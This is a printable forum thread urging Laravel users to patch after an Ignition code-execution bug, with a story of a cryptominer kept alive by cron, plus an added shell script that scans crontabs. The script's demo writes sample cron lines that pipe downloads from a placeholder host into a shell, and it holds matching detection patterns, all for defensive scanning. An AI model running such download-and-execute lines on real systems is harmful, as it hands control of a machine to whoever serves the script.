Post4VPS Forum | Free VPS Provider
Update your Laravel! - Printable Version




Update your Laravel! - LightDestory - 03-28-2021

I open this thread to let you know that you must always update your software!

Recently a new CVE has been filed that explains how to exploit an "Ignition" bug that allows the arbitrary execution of code. It is really dangerous.
One of my friend's VPSes has been infected by a cryptominer; the article I am going to post here talks about Docker APIs, but the same "malicious command" has been used in exploiting Laravel. He requested my help to eradicate that malware... well, it was a nightmare: killing the process was useless because a new one would start soon after. What you need to do is find a cron job that lets the malware in.

Another CVE regards database queries... but it is less dangerous than a miner inside your server! As the CVE article says, most attempts at this exploit will result in "no result" from the query...


Stay safe, stay updated!
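
The advice above to find the cron job that keeps relaunching the miner, as an added example that is not part of the original thread: a POSIX shell scan of the usual cron locations for entries that download and execute, decode payloads, or run from world-writable directories. The patterns are generic heuristics assumed for this example, not indicators from the incident described, and `example.invalid` is a placeholder.

```sh
#!/bin/sh
# Added example (not from the thread): list cron entries worth a manual look
# after a miner keeps respawning. The patterns are generic heuristics chosen
# for this example, not indicators taken from the incident described above.

# Download piped to a shell, base64 decoding, /dev/tcp, or world-writable paths.
SUSPICIOUS_RE='(curl|wget)[^|;&]*[|][[:space:]]*(ba|da|z)?sh([^[:alnum:]_]|$)'
SUSPICIOUS_RE="$SUSPICIOUS_RE"'|base64[[:space:]]+(-d|--decode)|/dev/tcp/'
SUSPICIOUS_RE="$SUSPICIOUS_RE"'|(/tmp|/var/tmp|/dev/shm)/[^[:space:]]+'

# scan_cron_file FILE: print "FILE:LINENO:LINE" for each suspicious,
# non-comment line. Prints nothing if the file is unreadable or clean.
scan_cron_file() {
  [ -r "$1" ] || return 0
  grep -nE -- "$SUSPICIOUS_RE" "$1" \
    | grep -vE '^[0-9]+:[[:space:]]*#' \
    | while IFS= read -r hit; do printf '%s:%s\n' "$1" "$hit"; done
}

# scan_all_cron [ROOT]: walk the usual system and per-user cron locations.
# ROOT is an optional prefix (e.g. a mounted disk image); default is the live system.
scan_all_cron() {
  for f in "${1:-}/etc/crontab" "${1:-}"/etc/cron.d/* \
           "${1:-}"/etc/cron.hourly/* "${1:-}"/etc/cron.daily/* \
           "${1:-}"/var/spool/cron/* "${1:-}"/var/spool/cron/crontabs/*; do
    if [ -f "$f" ]; then scan_cron_file "$f"; fi
  done
}

# demo: run the scan over a constructed crontab (all entries are made up).
demo() {
  d=$(mktemp -d) && mkdir -p "$d/etc/cron.d" || return 1
  cat > "$d/etc/cron.d/sample" <<'EOF'
# constructed sample entries
17 * * * * root run-parts /etc/cron.hourly
*/5 * * * * root curl -fsSL http://example.invalid/x.sh | sh
*/10 * * * * www-data /dev/shm/.cache/worker >/dev/null 2>&1
# */5 * * * * root wget -qO- http://example.invalid/y | bash
EOF
  scan_all_cron "$d"
  rm -rf "$d"
}
```

Run `scan_all_cron` as root so per-user crontabs are readable. Cron is only one place a respawner can live; systemd timers and shell profile files deserve the same review.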


RE: Update your Laravel! - debjit - 03-29-2021

Yup, update to the latest bug fixes. Don't use $request->all() or request()->all() to create, and hope for the best.
This bug is hopefully fixed
https://blog.laravel.com/security-laravel-62011-7302-8221-released


RE: Update your Laravel! - tiwil - 04-01-2021

That's from January and it's April now hahaha. If you're using dependabot in GitHub like me, you will get notified soon after a package gets updated. I'm pretty sure my Laravel is the newest but lemme check. Yep, it's the newest one.